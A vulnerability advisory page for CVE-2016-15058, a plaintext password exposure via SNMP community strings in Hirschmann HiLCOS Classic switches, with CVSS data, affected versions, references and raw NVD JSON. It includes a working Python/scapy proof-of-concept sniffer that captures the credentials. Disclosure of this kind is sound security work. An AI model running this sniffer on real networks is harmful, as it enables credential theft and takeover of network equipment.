Security Vulnerability Report
CVE-2016-15058 CVSS 8.1 HIGH

Published: 2026-04-03 22:16:25
Last Modified: 2026-04-07 13:20:55

Description

Hirschmann HiLCOS Classic Platform switches Classic L2E, L2P, L3E, L3P versions prior to 09.0.06 and Classic L2B prior to 05.3.07 contain a credential exposure vulnerability where user passwords are synchronized with SNMPv1/v2 community strings and transmitted in plaintext when the feature is enabled. Attackers with local network access can sniff SNMP traffic or extract configuration data to recover plaintext credentials and gain unauthorized administrative access to the switches.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Classic L2E < 09.0.06
Classic L2P < 09.0.06
Classic L3E < 09.0.06
Classic L3P < 09.0.06
Classic L2B < 05.3.07

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2016-15058: SNMP Community String Sniffing
# This script demonstrates how to capture plaintext credentials from SNMP traffic.
# Usage: sudo python3 cve_2016_15058_poc.py

from scapy.all import sniff, SNMP


def packet_callback(packet):
    """Callback to process captured packets."""
    if packet.haslayer(SNMP):
        # Extract the community string which is synced with the user password
        # In this vulnerability, the community string IS the password
        try:
            community = packet[SNMP].community.val.decode('utf-8', errors='ignore')
            print(f"[+] Captured SNMP Packet:")
            print(f" Source IP: {packet[0][1].src}")
            print(f" Destination IP: {packet[0][1].dst}")
            print(f" Community String (Plaintext Password): {community}")
        except Exception as e:
            print(f"Error parsing packet: {e}")


if __name__ == "__main__":
    print("[*] Starting SNMP sniffer for CVE-2016-15058...")
    print("[*] Listening on UDP port 161 (SNMP)...")
    print("[*] Press Ctrl+C to stop.")
    # Filter for UDP port 161 (standard SNMP port)
    try:
        sniff(filter="udp port 161", prn=packet_callback, store=0)
    except KeyboardInterrupt:
        print("\n[*] Sniffer stopped.")
```

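References

https://assets.belden.com/m/1d8273c6205dc400/original/Security-Bulletin-Password-Sync-SNMP-v1-v2-BSECV-2016-12.pdf
https://www.kb.cert.org/vuls/id/507216
https://www.vulncheck.com/advisories/hirschmann-hilcos-classic-platform-password-exposure-via-snmp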

Raw JSON Data

JSON
{"cve": {"id": "CVE-2016-15058", "sourceIdentifier": "[email protected]", "published": "2026-04-03T22:16:24.563", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hirschmann HiLCOS Classic Platform switches Classic L2E, L2P, L3E, L3P versions prior to 09.0.06 and Classic L2B prior to 05.3.07 contain a credential exposure vulnerability where user passwords are synchronized with SNMPv1/v2 community strings and transmitted in plaintext when the feature is enabled. Attackers with local network access can sniff SNMP traffic or extract configuration data to recover plaintext credentials and gain unauthorized administrative access to the switches."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": 
"NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-257"}]}], "references": [{"url": "https://assets.belden.com/m/1d8273c6205dc400/original/Security-Bulletin-Password-Sync-SNMP-v1-v2-BSECV-2016-12.pdf", "source": "[email protected]"}, {"url": "https://www.kb.cert.org/vuls/id/507216", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hirschmann-hilcos-classic-platform-password-exposure-via-snmp", "source": "[email protected]"}]}}